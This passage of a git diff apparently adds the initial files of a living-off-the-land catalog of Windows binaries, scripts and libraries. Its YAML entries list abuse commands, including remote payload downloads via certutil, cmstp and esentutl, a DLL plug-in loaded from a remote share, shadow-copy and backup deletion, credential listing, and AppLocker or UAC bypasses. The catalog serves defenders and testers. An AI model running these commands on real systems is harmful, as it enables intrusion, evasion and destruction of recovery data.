diff --git a/Backlog.txt b/Backlog.txt
new file mode 100644
index 0000000..73fc4eb
--- /dev/null
+++ b/Backlog.txt
@@ -0,0 +1,18 @@
+Ntsd.exe		Debugger
+Kd.exe			Debugger
+Certreq.exe		Exfiltrate data
+Dbghost.exe
+Robocopy.exe	Needs examples
+Vssadmin.exe	vssadmin.exe Delete Shadows /All /Quiet
+notepad.exe		Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
+wbadmin.exe 	wbadmin delete catalog -quiet
+psexec.exe		Remote execution of code
+java.exe		-agentpath:<dllname_with_dll_extension>  or   -agentlib:<dllname>
+WinMail.exe		DLL Sideloading
+odbcad32.exe	GUI DLL Loading
+WseClientSvc.exe	- https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f
+dvdplay.exe		http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
+http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
+https://twitter.com/Hexacorn/status/993498264497541120
+https://twitter.com/Hexacorn/status/994000792628719618
+https://github.com/MoooKitty/Code-Execution
diff --git a/Contribute.md b/Contribute.md
new file mode 100644
index 0000000..14ca7a0
--- /dev/null
+++ b/Contribute.md
@@ -0,0 +1,36 @@
+Use this a Template for new binaries and scripts. 
+If you think it is hard to make a pull request using github, don't hasitate 
+to send me a tweet and I will add the contribution for you.
+
+## Binary.exe
+
+* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials, Surveillance
+
+```
+Example
+```
+
+Acknowledgements:
+* Name of guy - @twitterhandle
+
+Code sample:
+* [NameOfLink](Payload/NameOfPayload)
+
+Resources:
+* https://linktosomethingusefull.com
+
+Full path:
+```
+c:\windows\system32\binary.exe
+c:\windows\sysWOW64\binary.exe
+```
+
+Notes:
+Some specific details about the binary file.
+
+
+Detection:
+Details about detection.
+IOC, Behaviour , User Agents etc
+
+ 
diff --git a/LOLBins.md b/LOLBins.md
new file mode 100644
index 0000000..48fe6af
--- /dev/null
+++ b/LOLBins.md
@@ -0,0 +1,102 @@
+# LOLBins - Living Off The Land Binaries
+Please contribute and do point out errors or resources I have forgotten.
+If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).    
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBin.png" height="150">
+   
+# OS BINARIES
+[Atbroker.exe](OSBinaries/Atbroker.md)    
+[Bash.exe](OSBinaries/Bash.md)    
+[Bitsadmin.exe](OSBinaries/Bitsadmin.md)    
+[Certutil.exe](OSBinaries/Certutil.md)    
+[Cmdkey.exe](OSBinaries/Cmdkey.md)    
+[Cmstp.exe](OSBinaries/Cmstp.md)     
+[Control.exe](OSBinaries/Control.md)     
+[Csc.exe](OSBinaries/Csc.md)    
+[Cscript.exe](OSBinaries/Cscript.md)    
+[Dfsvc.exe](OSBinaries/Dfsvc.md)     
+[Diskshadow.exe](OSBinaries/Diskshadow.md)     
+[Dnscmd.exe](OSBinaries/Dnscmd.md)     
+[Esentutl.exe](OSBinaries/Esentutl.md)     
+[Extexport.exe](OSBinaries/Extexport.md)     
+[Extrac32.exe](OSBinaries/Extrac32.md)     
+[Expand.exe](OSBinaries/Expand.md)     
+[Explorer.exe](OSBinaries/Explorer.md)          
+[Findstr.exe](OSBinaries/Findstr.md)     
+[Forfiles.exe](OSBinaries/Forfiles.md)    
+[Gpscript.exe](OSBinaries/Gpscript.md)        
+[Hh.exe](OSBinaries/Hh.md)    
+[Ieexec.exe](OSBinaries/Ieexec.md)     
+[Ie4unit.exe](OSBinaries/Ie4unit.md)     
+[Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)    
+[Installutil.exe](OSBinaries/Installutil.md)      
+[Makecab.exe](OSBinaries/Makecab.md)      
+[Mavinject.exe](OSBinaries/Mavinject.md)       
+[Msbuild.exe](OSBinaries/Msbuild.md)    
+[Msconfig.exe](OSBinaries/Msconfig.md)  
+[Msdt.exe](OSBinaries/Msdt.md)     
+[Mshta.exe](OSBinaries/Mshta.md)     
+[Msiexec.exe](OSBinaries/Msiexec.md)    
+[Netsh.exe](OSBinaries/Netsh.md)    
+[Nltest.exe](OSBinaries/Nltest.md)    
+[Odbcconf.exe](OSBinaries/Odbcconf.md)     
+[Openwith.exe](OSBinaries/Openwith.md)     
+[Pcalua.exe](OSBinaries/Pcalua.md)    
+[Pcwrun.exe](OSBinaries/Pcwrun.md)    
+[Powershell.exe](OSBinaries/Powershell.md)     
+[Presentationhost.exe](OSBinaries/Presentationhost.md)     
+[Print.exe](OSBinaries/Print.md)  
+[Psr.exe](OSBinaries/Psr.md)  
+[Reg.exe](OSBinaries/Reg.md)    
+[Regedit.exe](OSBinaries/Regedit.md)    
+[Regasm.exe](OSBinaries/Regasm.md)    
+[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)        
+[Regsvcs.exe](OSBinaries/Regsvcs.md)    
+[Regsvr32.exe](OSBinaries/Regsvr32.md)    
+[Replace.exe](OSBinaries/Replace.md)     
+[Robocopy.exe](OSBinaries/Robocopy.md)    
+[Rpcping.exe](OSBinaries/Rpcping.md)    
+[Rundll32.exe](OSBinaries/Rundll32.md)   
+[Runonce.exe](OSBinaries/Runonce.md)     
+[Runscripthelper.exe](OSBinaries/Runscripthelper.md)     
+[Sc.exe](OSBinaries/Sc.md)     
+[Scriptrunner.exe](OSBinaries/Scriptrunner.md)     
+[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)     
+[Wab.exe](OSBinaries/Wab.md)     
+[Wmic.exe](OSBinaries/Wmic.md)     
+[Wscript.exe](OSBinaries/Wscript.md)    
+[Xwizard.exe](OSBinaries/Xwizard.md)     
+   
+
+   
+# OTHER MICROSOFT SIGNED BINARIES
+[Appvlp.exe](OtherMSBinaries/Appvlp.md)    
+[Bginfo.exe](OtherMSBinaries/Bginfo.md)    
+[Cdb.exe](OtherMSBinaries/Cdb.md)    
+[Csi.exe](OtherMSBinaries/Csi.md)    
+[Dnx.exe](OtherMSBinaries/Dnx.md)   
+[Dxcap.exe](OtherMSBinaries/Dxcap.md)   
+[Mftrace.exe](OtherMSBinaries/Mftrace.md)     
+[Msdeploy.exe](OtherMSBinaries/Msdeploy.md)     
+[Msxsl.exe](OtherMSBinaries/Msxsl.md)    
+[Rcsi.exe](OtherMSBinaries/Rcsi.md)     
+[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)     
+[Sqlps.exe](OtherMSBinaries/Sqlps.md)  
+[Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md)   
+[Te.exe](OtherMSBinaries/Te.md)     
+[Tracker.exe](OtherMSBinaries/Tracker.md)  
+[Vsjitdebugger.exe](OtherMSBinaries/Vsjitdebugger.md)  
+[Winword.exe](OtherMSBinaries/Winword.md)    
+
+
+
+# OTHER NON MICROSOFT BINARIES
+[AcroRd32.exe](OtherBinaries/AcroRd32.md)    
+[Gpup.exe](OtherBinaries/Gpup.md)    
+[Nlnotes.exe](OtherBinaries/Nlnotes.md)     
+[Notes.exe](OtherBinaries/Notes.md)     
+[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)     
+[Nvudisp.exe](OtherBinaries/Nvudisp.md)    
+[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)     
+[Usbinst.exe](OtherBinaries/Usbinst.md)     
+[ROCCAT_Swarm.exe](OtherBinaries/ROCCAT_Swarm.md)     
+[Setup.exe](OtherBinaries/Setup.md) - Launches HP Installer for HP LaserJet Enterprise 700 color MFP M775 Printer Series Full Software and Drivers    
diff --git a/LOLLibs.md b/LOLLibs.md
new file mode 100644
index 0000000..b4fce91
--- /dev/null
+++ b/LOLLibs.md
@@ -0,0 +1,25 @@
+# LOLLibs - Living Off The Land Libraries
+Please contribute and do point out errors or resources I have forgotten.
+If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).    
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLLib.png" height="150">
+   
+# OS LIBRARIES
+[Advpack.dll](OSLibraries/Advpack.md)    
+[Ieadvpack.dll](OSLibraries/Ieadvpack.md)    
+[Ieframe.dll](OSLibraries/Ieframe.md)    
+[Mshtml.dll](OSLibraries/Mshtml.md)    
+[Pcwutl.dll](OSLibraries/Pcwutl.md)    
+[Shdocvw.dll](OSLibraries/Shdocvw.md)    
+[Zipfldr.dll](OSLibraries/Zipfldr.md)    
+[Shell32.dll](OSLibraries/Shell32.md)    
+[Setupapi.dll](OSLibraries/Setupapi.md)    
+[Url.dll](OSLibraries/Url.md)    
+[Zipfldr.dll](OSLibraries/Zipfldr.md)    
+   
+# OTHER MICROSOFT SIGNED LIBRARIES
+
+
+# OTHER NON MICROSOFT LIBRARIES
+ 
+
+
diff --git a/LOLScripts.md b/LOLScripts.md
new file mode 100644
index 0000000..49d1da4
--- /dev/null
+++ b/LOLScripts.md
@@ -0,0 +1,23 @@
+# LOLScripts - Living Off The Land Scripts
+Please contribute and do point out errors or resources I have forgotten.
+If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).    
+<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLScript.png" height="150">
+
+# OS SCRIPTS
+[Cl_invocation.ps1](OSScrits/Cl_invocation.md)       
+[CL_mutexverifiers.ps1](OSScripts/CL_mutexverifiers.md)       
+[Manage-bde.vbs](OSScripts/Manage-bde.md)     
+[pester.bat](OSScripts/pester.md)     
+[Pubprn.vbs](OSScripts/Pubprn.md)     
+[Slmgr.vbs](OSScripts/Slmgr.md)      
+[Syncappvpublishingserver.vbs](OSScripts/Syncappvpublishingserver.md)    
+[Winrm.vbs](OSScripts/Winrm.md)      
+
+
+
+# OTHER MICROSOFT SIGNED SCRIPTS
+
+
+
+# OTHER NON MICROSOFT BINARIES
+[Testxlst.js](OtherScripts/Testxlst.md)      
\ No newline at end of file
diff --git a/Logo/LOL1.png b/Logo/LOL1.png
new file mode 100644
index 0000000..48322de
Binary files /dev/null and b/Logo/LOL1.png differ
diff --git a/Logo/LOL2.png b/Logo/LOL2.png
new file mode 100644
index 0000000..d7255ca
Binary files /dev/null and b/Logo/LOL2.png differ
diff --git a/Logo/LOL3.png b/Logo/LOL3.png
new file mode 100644
index 0000000..5da3762
Binary files /dev/null and b/Logo/LOL3.png differ
diff --git a/Logo/LOLBAS.png b/Logo/LOLBAS.png
new file mode 100644
index 0000000..a2e8321
Binary files /dev/null and b/Logo/LOLBAS.png differ
diff --git a/Logo/LOLBAS2.png b/Logo/LOLBAS2.png
new file mode 100644
index 0000000..b574965
Binary files /dev/null and b/Logo/LOLBAS2.png differ
diff --git a/Logo/LOLBAS3.png b/Logo/LOLBAS3.png
new file mode 100644
index 0000000..7afc24a
Binary files /dev/null and b/Logo/LOLBAS3.png differ
diff --git a/Logo/LOLBin.png b/Logo/LOLBin.png
new file mode 100644
index 0000000..9e857a6
Binary files /dev/null and b/Logo/LOLBin.png differ
diff --git a/Logo/LOLLib.png b/Logo/LOLLib.png
new file mode 100644
index 0000000..a3c965f
Binary files /dev/null and b/Logo/LOLLib.png differ
diff --git a/Logo/LOLScript.png b/Logo/LOLScript.png
new file mode 100644
index 0000000..bae1429
Binary files /dev/null and b/Logo/LOLScript.png differ
diff --git a/OSBinaries/Atbroker.yml b/OSBinaries/Atbroker.yml
new file mode 100644
index 0000000..af73012
--- /dev/null
+++ b/OSBinaries/Atbroker.yml
@@ -0,0 +1,20 @@
+---
+Name: Atbroker.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: ATBroker.exe /start malware
+    Description: Start a registered Assistive Technology (AT).
+Full Path:
+  - C:\Windows\System32\Atbroker.exe
+  - C:\Windows\SysWOW64\Atbroker.exe
+Code Sample: []
+Detection: []
+Resources:
+  - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
+Notes: >
+  Thanks to Adam - @hexacorn
+  Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
+
diff --git a/OSBinaries/Bash.yml b/OSBinaries/Bash.yml
new file mode 100644
index 0000000..9f61b57
--- /dev/null
+++ b/OSBinaries/Bash.yml
@@ -0,0 +1,17 @@
+---
+Name: Bash.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: bash.exe -c calc.exe
+    Description: Execute calc.exe.
+Full Path:
+  - '?'
+Code Sample: []
+Detection: []
+Resources:
+  - ''
+Notes: Thanks to ?
+
diff --git a/OSBinaries/Bitsadmin.yml b/OSBinaries/Bitsadmin.yml
new file mode 100644
index 0000000..61ef57d
--- /dev/null
+++ b/OSBinaries/Bitsadmin.yml
@@ -0,0 +1,36 @@
+---
+Name: Bitsadmin.exe
+Description: Execute, Download, Copy, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: |
+          bitsadmin /create 1
+          bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
+          bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
+          bitsadmin /RESUME 1
+          bitsadmin /complete 1
+  - Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
+  - Command: |
+          bitsadmin /create 1
+          bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
+          bitsadmin /RESUME 1
+          bitsadmin /complete 1
+    Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
+  - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
+    Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
+  - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
+    Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
+Full Path:
+  - c:\Windows\System32\bitsadmin.exe
+  - c:\Windows\SysWOW64\bitsadmin.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
+    - Slide 53
+  - https://www.youtube.com/watch?v=_8xJaaQlpBo
+  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Certutil.yml b/OSBinaries/Certutil.yml
new file mode 100644
index 0000000..9f88e41
--- /dev/null
+++ b/OSBinaries/Certutil.yml
@@ -0,0 +1,25 @@
+---
+Name: Certutil.exe
+Description: Download, Add ADS, Decode, Encode
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
+    Description: Download and save 7zip to disk in the current folder.
+  - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+    Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
+  - Command: |
+          certutil -encode inputFileName encodedOutputFileName
+          certutil -decode encodedInputFileName decodedOutputFileName
+    Description: Commands to encode and decode a file using Base64.
+Full Path:
+  - c:\windows\system32\certutil.exe
+  - c:\windows\sysWOW64\certutil.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/Moriarty_Meng/status/984380793383370752
+  - https://twitter.com/mattifestation/status/620107926288515072
+Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016
+
diff --git a/OSBinaries/Cmdkey.yml b/OSBinaries/Cmdkey.yml
new file mode 100644
index 0000000..a87826d
--- /dev/null
+++ b/OSBinaries/Cmdkey.yml
@@ -0,0 +1,18 @@
+---
+Name: Cmdkey.exe
+Description: Credentials
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: cmdkey /list
+    Description: List cached credentials.
+Full Path:
+  - c:\windows\system32\cmdkey.exe
+  - c:\windows\sysWOW64\cmdkey.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
+Notes: ''
+
diff --git a/OSBinaries/Cmstp.yml b/OSBinaries/Cmstp.yml
new file mode 100644
index 0000000..014e7b2
--- /dev/null
+++ b/OSBinaries/Cmstp.yml
@@ -0,0 +1,26 @@
+---
+Name: Cmstp.exe
+Description: Execute, UACBypass
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
+    Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
+  - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
+    Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
+Full Path:
+  - C:\Windows\system32\cmstp.exe
+  - C:\Windows\sysWOW64\cmstp.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/NickTyrer/status/958450014111633408
+  - https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
+  - https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
+  - https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
+  - https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
+    (UAC Bypass)
+  - https://github.com/hfiref0x/UACME
+Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer
+
diff --git a/OSBinaries/Control.yml b/OSBinaries/Control.yml
new file mode 100644
index 0000000..9c97e39
--- /dev/null
+++ b/OSBinaries/Control.yml
@@ -0,0 +1,21 @@
+---
+Name: Control.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: control.exe c:\windows\tasks\file.txt:evil.dll
+    Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
+Full Path:
+  - 'C:\Windows\system32\control.exe    '
+  - 'C:\Windows\sysWOW64\control.exe     '
+Code Sample: []
+Detection: []
+Resources:
+  - https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
+  - https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
+  - https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
+  - https://twitter.com/bohops/status/955659561008017409
+Notes: Thanks to Jimmy - @bohops
+
diff --git a/OSBinaries/Csc.yml b/OSBinaries/Csc.yml
new file mode 100644
index 0000000..f90575b
--- /dev/null
+++ b/OSBinaries/Csc.yml
@@ -0,0 +1,21 @@
+---
+Name: Csc.exe
+Description: Compile
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: csc -out:My.exe File.cs
+    Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
+  - Command: csc -target:library File.cs
+    Description: ''
+Full Path:
+  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
+  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
+  - ''
+Notes: Thanks to ?
+
diff --git a/OSBinaries/Cscript.yml b/OSBinaries/Cscript.yml
new file mode 100644
index 0000000..757ee19
--- /dev/null
+++ b/OSBinaries/Cscript.yml
@@ -0,0 +1,19 @@
+---
+Name: Cscript.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: cscript c:\ads\file.txt:script.vbs
+    Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
+Full Path:
+  - c:\windows\system32\cscript.exe
+  - c:\windows\sysWOW64\cscript.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+  - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+Notes: Thanks to Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Dfsvc.yml b/OSBinaries/Dfsvc.yml
new file mode 100644
index 0000000..463b03d
--- /dev/null
+++ b/OSBinaries/Dfsvc.yml
@@ -0,0 +1,19 @@
+---
+Name: Dfsvc.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Missing Example
+    Description: ''
+Full Path:
+  - 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe     '
+  - 'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe    '
+  - 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe    '
+  - 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe    '
+Code Sample: []
+Detection: []
+Resources:
+  - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
+Notes: Thanks to Casey Smith - @subtee
diff --git a/OSBinaries/Diskshadow.yml b/OSBinaries/Diskshadow.yml
new file mode 100644
index 0000000..d57c043
--- /dev/null
+++ b/OSBinaries/Diskshadow.yml
@@ -0,0 +1,20 @@
+---
+Name: Diskshadow.exe
+Description: Execute, Dump NTDS.dit
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: diskshadow.exe /s c:\test\diskshadow.txt
+    Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
+  - Command: diskshadow> exec calc.exe
+    Description: Execute a calc.exe using diskshadow.exe.
+Full Path:
+  - c:\windows\system32\diskshadow.exe
+  - c:\windows\sysWOW64\diskshadow.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+Notes: Thanks to Jimmy - @bohops
+
diff --git a/OSBinaries/Dns.yml b/OSBinaries/Dns.yml
new file mode 100644
index 0000000..8afb67b
--- /dev/null
+++ b/OSBinaries/Dns.yml
@@ -0,0 +1,27 @@
+---
+Name: Dnscmd.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
+    Description: 'Adds a specially crafted DLL as a plug-in of the DNS Service.'
+Full Path:
+  - c:\windows\system32\Dnscmd.exe
+  - c:\windows\sysWOW64\Dnscmd.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
+  - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
+  - https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
+  - https://twitter.com/Hexacorn/status/994000792628719618
+  - http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
+Notes: |
+    This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details.
+    Thanks to Shay Ber - ?,
+    Dimitrios Slamaris - @dim0x69,
+    Nikhil SamratAshok,
+    Mittal - @nikhil_mitt
+
diff --git a/OSBinaries/Esentutl.yml b/OSBinaries/Esentutl.yml
new file mode 100644
index 0000000..2347837
--- /dev/null
+++ b/OSBinaries/Esentutl.yml
@@ -0,0 +1,28 @@
+---
+Name: Esentutl.exe
+Description: Copy, Download, Write ADS, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
+    Description: Copies the source VBS file to the destination VBS file.
+  - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
+    Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
+  - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
+    Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
+  - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
+    Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
+  - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
+    Description: Copies the source EXE to the destination EXE file.
+  - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
+    Description: Copies the source EXE to the destination EXE file
+Full Path:
+  - c:\windows\system32\esentutl.exe
+  - c:\windows\sysWOW64\esentutl.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/egre55/status/985994639202283520
+Notes: Thanks to egre55 - @egre55
+
diff --git a/OSBinaries/Expand.yml b/OSBinaries/Expand.yml
new file mode 100644
index 0000000..dea7d4b
--- /dev/null
+++ b/OSBinaries/Expand.yml
@@ -0,0 +1,23 @@
+---
+Name: Expand.exe
+Description: Download, Copy, Add ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
+    Description: 'Copies source file to destination.'
+  - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
+    Description: 'Copies source file to destination.'
+  - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
+    Description: 'Copies source file to destination Alternate Data Stream (ADS).'
+Full Path:
+  - c:\windows\system32\Expand.exe
+  - c:\windows\sysWOW64\Expand.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/infosecn1nja/status/986628482858807297
+  - https://twitter.com/Oddvarmoe/status/986709068759949319
+Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Explorer.yml b/OSBinaries/Explorer.yml
new file mode 100644
index 0000000..ac7879b
--- /dev/null
+++ b/OSBinaries/Explorer.yml
@@ -0,0 +1,18 @@
+---
+Name: Explorer.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: explorer.exe calc.exe
+    Description: 'Executes calc.exe as a subprocess of explorer.exe.'
+Full Path:
+  - c:\windows\explorer.exe
+  - c:\windows\sysWOW64\explorer.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/bohops/status/986984122563391488
+Notes: Thanks to Jimmy - @bohops
+
diff --git a/OSBinaries/Extexport.yml b/OSBinaries/Extexport.yml
new file mode 100644
index 0000000..a858f1e
--- /dev/null
+++ b/OSBinaries/Extexport.yml
@@ -0,0 +1,18 @@
+---
+Name: Extexport.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Extexport.exe c:\test foo bar
+    Description: 'Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll'
+Full Path:
+  - 'C:\Program Files\Internet Explorer\Extexport.exe    '
+  - C:\Program Files\Internet Explorer(x86)\Extexport.exe
+Code Sample: []
+Detection: []
+Resources:
+  - http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
+Notes: Thanks to Adam - @hexacorn
+
diff --git a/OSBinaries/Extrac32.yml b/OSBinaries/Extrac32.yml
new file mode 100644
index 0000000..3d8febe
--- /dev/null
+++ b/OSBinaries/Extrac32.yml
@@ -0,0 +1,24 @@
+---
+Name: Extrac32.exe
+Description: Add ADS, Download
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
+    Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
+  - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
+    Description: 'Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.'
+  - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
+    Description: 'Copy the source file to the destination file and overwrite it.'
+Full Path:
+  - c:\windows\system32\extrac32.exe
+  - c:\windows\sysWOW64\extrac32.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+  - https://twitter.com/egre55/status/985994639202283520
+Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55
+
diff --git a/OSBinaries/Findstr.yml b/OSBinaries/Findstr.yml
new file mode 100644
index 0000000..5945a9d
--- /dev/null
+++ b/OSBinaries/Findstr.yml
@@ -0,0 +1,23 @@
+---
+Name: Findstr.exe
+Description: Add ADS, Search
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
+    Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
